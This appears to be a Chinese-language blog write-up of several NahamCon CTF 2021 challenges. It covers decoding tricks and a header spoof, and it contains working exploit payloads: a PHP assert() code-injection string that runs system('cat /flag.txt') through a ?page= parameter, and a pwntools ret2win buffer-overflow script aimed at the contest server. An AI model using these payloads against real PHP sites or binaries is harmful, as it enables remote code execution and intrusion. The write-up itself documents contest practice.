NahamCon CTF 2021 (部分wp)

由 admin 发布

Chicken Wings

在线解码

http://grompe.org.ru/static/wingdings_gaster.html

然后在转换全小写

Shoelaces

010 打开图片

搜索 flag 字符串得到

esab64

flag = "mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X"

print(flag[::-1])

flag2 = "_}e61e711106bd0db1b78efa894b1125bf{galf"

print(flag2[::-1])

得到flag

X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm

flag{fb5211b498afe87b1bd0db601117e16e}_

Homeward Bound

添加 XFF 头即可获得flag

image-20210313150916649

image-20210313150934854

Asserted

得到flag

  • 文件包含

image-20210313155604370

通过观察网页看到连接后面带有 ?page= 推测位为文件包含

使用伪协议包含得到代码

?page=php://filter/convert.base64-encode/resource=index

<?php

if (isset($_GET['page'])) {
  $page = $_GET['page'];
  $file = $page . ".php";

  // Saving ourselves from any kind of hackings and all
  assert("strpos('$file', '..') === false") or die("HACKING DETECTED! PLEASE STOP THE HACKING PRETTY PLEASE");
  
} else {
  $file = "home.php";
}

include($file);

?>

第8行代码使用了 assert

image-20210313155846908

这里可以看到 assert 是可以执行代码的

所以构造payload 来闭合语句

Payload

?page=', '..') === false and system('cat /flag.txt') or true or strpos('

得到flag

参考

https://hydrasky.com/network-security/php-assert-vulnerable-to-local-file-inclusion/

Ret2basic

查看保护

➜  ~ checksec ret2basic 
[*] '/home/yutian/ret2basic'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

vuln

__int64 vuln()
{
  char v1; // [rsp+0h] [rbp-70h]

  printf("Can you overflow this?: ");
  return gets(&v1);
}

win

void __noreturn win()
{
  int n; // [rsp+Ch] [rbp-14h]
  char *s; // [rsp+10h] [rbp-10h]
  FILE *stream; // [rsp+18h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts("Failed to open the flag file.");
    exit(1);
  }
  fseek(stream, 0LL, 2);
  n = ftell(stream);
  rewind(stream);
  s = (char *)malloc(n);
  if ( !s )
  {
    puts("Failed to allocate memory.");
    exit(1);
  }
  fgets(s, n, stream);
  fclose(stream);
  puts("Here's your flag.");
  puts(s);
  free(s);
  exit(0);
}

本题没有保护,win溢出到 win 函数 即可获得flag

偏移为 70h

Payload

from pwn import *

# io = process("./ret2basic")
io = remote("challenge.nahamcon.com", 30413)
payload = b'a' * (0x70 + 0x8) + p64(0x0401215)

io.sendline(payload)

io.interactive()

暂无评论

发表评论